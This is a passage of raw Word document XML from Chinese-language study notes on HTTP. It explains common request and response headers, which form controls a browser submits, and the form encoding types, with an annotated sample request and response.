          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Accept：text/plain（指定客户端能够接收的内容类型）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Range：bytes=0-999（常用作断点续传，设置请求的指定范围，服务器则返回Content-Range: bytes 0-999）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Referer： （当前请求来源的网页地址）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Origin： （和Referer差不多，只存在于POST请求）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Host:： （指定请求的服务器的域名和端口号）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>User-Agent:：Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36（当前客户端的信息）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Expect：100-continue（握手失败，请求头域类型不匹配，由此导致的API接口调用失败）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Response返回头</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Connection: keep-alive（连接方式，很重要）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Access-Control-Allow-Origin: *（跨域，很重要）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Set-Cookie: UserID=admin; Max-Age=3600; Version=1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Content-Encoding:gzip</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="43"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>表单提交与成功控件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Courier New" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>浏览器并不是将所有的表单控件全部发送到服务器的，而是会查找所有的【</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>成功控件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>】，只将这些成功控件的数据发送到服务端， 什么是成功控件呢？</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简单地来说，成功控件就是：每个表单中的控件都应该有一个name属性和”当前值“， 在提交时，它们将以 name=value 的形式做为提交数据的一部分。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pP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对于一些特殊情况，成功控件还有以下规定：</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1. 控件不能是【禁用】状态，即指定【disabled="disabled"】。即：禁用的控件将不是成功控件。</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2. 如果一个表单包含了多个提交按键，那么仅当用户点击的那个提交按钮才算是成功控件。</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3. 对于checkbox控件来说，只有被用户勾选的才算是成功控件。</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4. 对于radio button来说，只有被用户勾选的才算是成功控件。</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5. 对于select控件来说，所有被选择的选项都做为成功控件，name由select控件提供。</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6. 对于file上传文件控件来说，如果它包含了选择的文件，那么它将是一个成功控件。</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此外，浏览器不会考虑Reset按钮以及OBJECT元素。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Courier New" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>控件输入的内容并不是直接发送的， 而是经过一种编码规则来处理的。目前基本上只会只使用二种编码规则：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="0070C0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">application/x-www-form-urlencoded 和 multipart/form-data </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>， 这二个规则的使用场景简单地说就是：后者在上传文件时使用，其它情形则使用前者(默认)。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>这个规则是在哪里指定的呢？ 其实form还有个enctype属性，用它就可以指定编码规则</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>浏览</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Courier New" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>处理表单数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Courier New" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>过程大致分为4个阶段：</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1. 识别所有的成功控件。</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2. 为所有的成功控件创建一个数据集合，它们包含 control-name/current-value 这样的值对。</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3. 按照form.enctype指定的编码规则对前面准备好的数据进行编码。编码规则将放在请求中，用【Content-Type】指出。</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4. 提交编码后的数据。此时会区分post,get二种情况，提交的地址由form.action属性指定的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="43"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>常见的请求头和响应头</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1)请求(客户端-&gt;服务端[request])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    GET(请求的方式) /newcoder/hello.html(请求的目标资源) HTTP/1.1(请求采用的协议和版本号)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    Accept: */*(客户端能接收的资源类型)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    Accept-Language: en-us(客户端接收的语言类型)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    Connection: Keep-Alive(维护客户端和服务端的连接关系)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    Host: localhost:8080(连接的目标主机和端口号)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    Referer: http://localhost/links.asp(告诉服务器我来自于哪里)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    User-Agent: Mozilla/4.0(客户端版本号的名字)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    Accept-Encoding: gzip, deflate(客户端能接收的压缩数据的类型)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    If-Modified-Since: Tue, 11 Jul 2000 18:23:51 GMT(缓存时间) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    Cookie(客户端暂存服务端的信息)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>    Date: Tue, 11 Jul 2000 18:23:51 GMT(客户端请求服务端的时间)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>2)响应(服务端-&gt;客户端[response])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>    HTTP/1.1(响应采用的协议和版本号) 200(状态码) OK(描述信息)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>    Location: http://www.baidu.com(服务端需要客户端访问的页面路径) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>    Server:apache tomcat(服务端的Web服务端名)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>    Content-Encoding: gzip(服务端能够发送压缩编码类型) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>    Content-Length: 80(服务端发送的压缩数据的长度) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>    Content-Language: zh-cn(服务端发送的语言类型) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>    Content-Type: text/html; charset=GB2312(服务端发送的类型及采用的编码方式)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>    Last-Modified: Tue, 11 Jul 2000 18:23:51 GMT(服务端对该资源最后修改的时间)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>    Refresh: 1;url=http://www.it315.org(服务端要求客户端1秒钟后，刷新，然后访问指定的页面路径)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>    Content-Disposition: attachment; filename=aaa.zip(服务端要求客户端以下载文件的方式打开该文件)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
